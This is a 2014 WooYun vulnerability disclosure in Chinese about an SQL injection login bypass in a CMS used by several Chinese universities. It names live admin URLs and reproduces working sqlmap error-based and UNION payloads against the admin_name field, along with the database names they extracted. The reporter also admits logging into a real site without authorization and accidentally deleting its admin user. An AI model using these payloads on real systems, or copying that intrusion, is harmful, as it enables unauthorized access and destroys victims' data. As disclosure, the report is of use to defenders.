漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-055845
漏洞标题:某内容管理系统存在万能密码登录(涉及多个院校)
相关厂商:cncert国家互联网应急中心
漏洞作者: Mr.leo
提交时间:2014-04-08 17:48
修复时间:2014-07-07 17:48
公开时间:2014-07-07 17:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-08: 细节已通知厂商并且等待厂商处理中
2014-04-13: 厂商已经确认,细节仅向厂商公开
2014-04-16: 细节向第三方安全合作伙伴开放
2014-06-07: 细节向核心白帽子及相关领域专家公开
2014-06-17: 细节向普通白帽子公开
2014-06-27: 细节向实习白帽子公开
2014-07-07: 细节向公众公开
简要描述:
某内容管理系统存在万能密码登录(涉及多个院校)
详细说明:
南京先极
问题:网站首页暴露了管理入口链接,后台系统用户名处(post方式admin_name)存在注入,导致万能密码登录 用两个实例说明问题
http://202.119.84.62/web_admin/
http://gschool.hebmu.edu.cn/web_admin/index.aspx
http://yjs.cdutcm.edu.cn/web_admin/index.aspx
百度关键字能找到不少
网站一:
http://gschool.hebmu.edu.cn/web_admin/index.aspx
管理员权限,可新建、编辑、修改、删除
网站二,
http://yjs.cdutcm.edu.cn/web_admin/index.aspx
burp抓包数据如下:
POST http://yjs.cdutcm.edu.cn/web_admin/index.aspx HTTP/1.1
Host: yjs.cdutcm.edu.cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://yjs.cdutcm.edu.cn/web_admin/index.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 303
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTg1OTAwNTc1MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGxvZ2luc3VicrlH2zpsGM6MU3tnsAJr02rL158%3D&admin_name=1&admin_pass=1&loginsub.x=32&loginsub.y=11&__EVENTVALIDATION=%2FwEWBAKG5cjNCQKYwZuCBALc7ofXDwK%2BvO6XBkQFK3MRxUSNoxCPuyTIGEe%2FAb7s
Place: POST
Parameter: admin_name
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTg1OTAwNTc1MmQ
YAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGxvZ2luc3VicrlH2zpsGM6MU3tnsAJ
r02rL158=&admin_name=1' AND 5129=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(101)+CHAR(
109)+CHAR(58)+(SELECT (CASE WHEN (5129=5129) THEN CHAR(49) ELSE CHAR(48) END))+C
HAR(58)+CHAR(101)+CHAR(98)+CHAR(107)+CHAR(58))) AND 'sVfJ'='sVfJ&admin_pass=1&lo
ginsub.x=32&loginsub.y=11&__EVENTVALIDATION=/wEWBAKG5cjNCQKYwZuCBALc7ofXDwK+vO6X
BkQFK3MRxUSNoxCPuyTIGEe/Ab7s
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTg1OTAwNTc1MmQ
YAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGxvZ2luc3VicrlH2zpsGM6MU3tnsAJ
r02rL158=&admin_name=1' UNION ALL SELECT CHAR(58)+CHAR(111)+CHAR(101)+CHAR(109)+
CHAR(58)+CHAR(67)+CHAR(104)+CHAR(79)+CHAR(109)+CHAR(85)+CHAR(66)+CHAR(83)+CHAR(1
10)+CHAR(71)+CHAR(116)+CHAR(58)+CHAR(101)+CHAR(98)+CHAR(107)+CHAR(58), NULL, NUL
L, NULL, NULL, NULL, NULL, NULL, NULL-- &admin_pass=1&loginsub.x=32&loginsub.y=1
1&__EVENTVALIDATION=/wEWBAKG5cjNCQKYwZuCBALc7ofXDwK+vO6XBkQFK3MRxUSNoxCPuyTIGEe/
Ab7s
---
[16:21:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:21:33] [INFO] fetching current user
current user: 'cdwz'
[16:21:52] [INFO] fetching current database
current database: 'wznew'
[16:22:11] [INFO] fetching database names
[16:22:30] [INFO] the SQL query used returns 7 entries
[16:22:49] [INFO] retrieved: "distribution"
[16:23:08] [INFO] retrieved: "Gmis31"
[16:23:27] [INFO] retrieved: "master"
[16:23:46] [INFO] retrieved: "model"
[16:24:05] [INFO] retrieved: "msdb"
[16:24:24] [INFO] retrieved: "tempdb"
[16:24:43] [INFO] retrieved: "wznew"
available databases [7]:
[*] distribution
[*] Gmis31
[*] master
[*] model
[*] msdb
[*] tempdb
[*] wznew
漏洞证明:
已经证明
修复方案:
过滤参数
隐藏管理入口
ps:需要说明的是在检测这个网站的时候http://yjs.cdutcm.edu.cn/web_admin/index.aspx
登录之后误操作,删除了登录用户,目前无法登录后台了。。。,不过注入是存在的。登录只是为了更好的验证漏洞存在,没有做过任何破坏性的操作,请予以谅解。
请cncert国家互联网应急中心联系院方或者软件厂商说明一下,谢谢。
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-04-13 10:07
厂商回复:
CNVD确认并在多个实例上复现所述情况,已经由CNVD向教育网应急组织(赛尔网络公司)通报,建议其重点处置测试发现多个高校用户。同时抄报CCERT。
最新状态:
暂无